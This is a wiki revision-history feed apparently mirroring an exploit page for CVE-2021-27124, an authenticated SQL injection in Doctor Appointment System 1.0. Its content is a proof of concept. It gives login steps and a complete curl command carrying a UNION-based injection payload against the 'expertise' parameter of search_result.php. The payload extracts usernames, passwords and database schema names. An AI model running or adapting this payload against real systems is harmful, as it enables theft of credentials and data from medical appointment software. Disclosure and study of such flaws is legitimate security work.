<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-27124_Doctor_Appointment_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2021-27124 Doctor Appointment System 1.0 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-27124_Doctor_Appointment_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-27124_Doctor_Appointment_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-27T10:31:59Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2021-27124_Doctor_Appointment_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=3636&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection # Date: 2021-02-09 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://ww...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-27124_Doctor_Appointment_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=3636&amp;oldid=prev"/>
		<updated>2021-05-30T03:01:58Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection # Date: 2021-02-09 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://ww...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection&lt;br /&gt;
# Date: 2021-02-09&lt;br /&gt;
# Exploit Author: Soham Bakore, Nakul Ratti&lt;br /&gt;
# Vendor Homepage:&lt;br /&gt;
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html&lt;br /&gt;
# Software Link:&lt;br /&gt;
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html&lt;br /&gt;
# Version: V1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vulnerable File:&lt;br /&gt;
----------------&lt;br /&gt;
http://host/patient/search_result.php&lt;br /&gt;
&lt;br /&gt;
Vulnerable Issue:&lt;br /&gt;
-----------------&lt;br /&gt;
Expertise parameter has no input validation&lt;br /&gt;
&lt;br /&gt;
POC:&lt;br /&gt;
----&lt;br /&gt;
1] Login as a normal patient user&lt;br /&gt;
2] Insert cookie after successful login in the below command:&lt;br /&gt;
curl -i -s -o tmp -k -X $'POST' \&lt;br /&gt;
    -H $'Host: 192.168.1.12' -H $'Content-Type:&lt;br /&gt;
application/x-www-form-urlencoded' -H $'Content-Length: 288' -H&lt;br /&gt;
$'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' -H&lt;br /&gt;
$'Upgrade-Insecure-Requests: 1' \&lt;br /&gt;
    -b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \&lt;br /&gt;
    --data-binary&lt;br /&gt;
$'expertise=Bone\'+union+select+concat(\'Username-\',username),2,3,(select+(%40a)+from+(select(%40a%3a%3d0x00),(select+(%40a)+from+(information_schema.schemata)where+(%40a)in+(%40a%3a%3dconcat(%40a,schema_name,\'&amp;lt;br&amp;gt;\'))))a),concat(\'Password\',\'-\',password),6,7,8,9,10,11,12+from+users%23&amp;amp;submit='&lt;br /&gt;
\&lt;br /&gt;
    $'http://host/patient/search_result.php'&lt;br /&gt;
3] Check the tmp file for sensitive information from the database.&lt;br /&gt;
------------------&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>